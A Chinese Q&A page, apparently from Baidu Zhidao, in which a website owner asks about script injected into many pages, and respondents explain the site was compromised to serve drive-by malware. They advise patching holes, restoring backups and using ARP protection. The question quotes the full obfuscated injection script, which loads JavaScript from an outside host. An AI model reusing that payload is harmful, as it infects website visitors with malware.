服务器问题!好像是木马。还有说是ARP欺骗。高手进来!

来源:百度知道 编辑:UC知道 时间:2024/05/05 11:27:57
网站中只要是index.asp、conn.asp、index.html,default.asp、top.asp等网页都被加入<script>document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x68\x74\x74\x70\x3A\x2F\x2F\x4F\x25\x36\x36\x25\x36\x36\x25\x34\x39\x25\x36\x33\x65\x25\x32\x45\x25\x34\x36\x25\x34\x31\x51\x25\x35\x33\x25\x36\x35\x25\x37\x32\x76\x2E\x25\x34\x33\x25\x36\x46\x25\x34\x44\x2F\x25\x34\x36\x25\x34\x31\x25\x35\x31\x25\x32\x45\x25\x36\x41\x25\x37\x33\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E");</script>
代码,经过解密后是document.writeln('<script src=http:/

不是那么回事,你的网站被人种了木马,上面的代码网页是病毒,会让访问者中毒,病毒文件是rl.js,它可以让客户机自动下载病毒,并执行。建议你还是对网站安全做一次全面的整理吧,一是去除你网站或服务器的漏洞二是查一下看看是不是已经有木马在你的网站里存在。

杀毒软件是杀不出来的,因为你是被挂马了,所谓挂马就是在你网页中加入一个脚本地址,而地址是不会被杀软认为是病毒的,只有在用户打开网页时才会下载病毒。处理的办法只有一个就是先堵住所有漏洞,再把网页中已有的后门程序找到删除。但是不大好找,还有个笨办法就是把现在服务器上的文件全删再把原有的备份传上去,再堵住漏洞就可以了,一般常见的是注入攻击,你也可以在网上找些解决办法。

用卡巴 对服务器进行杀毒 这个是ARP欺骗标准的出现故障主要是通过360网顿 好像是这个吧 网吧 的管理员一般都GHOST解决的

装ARP防火墙试试。

hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh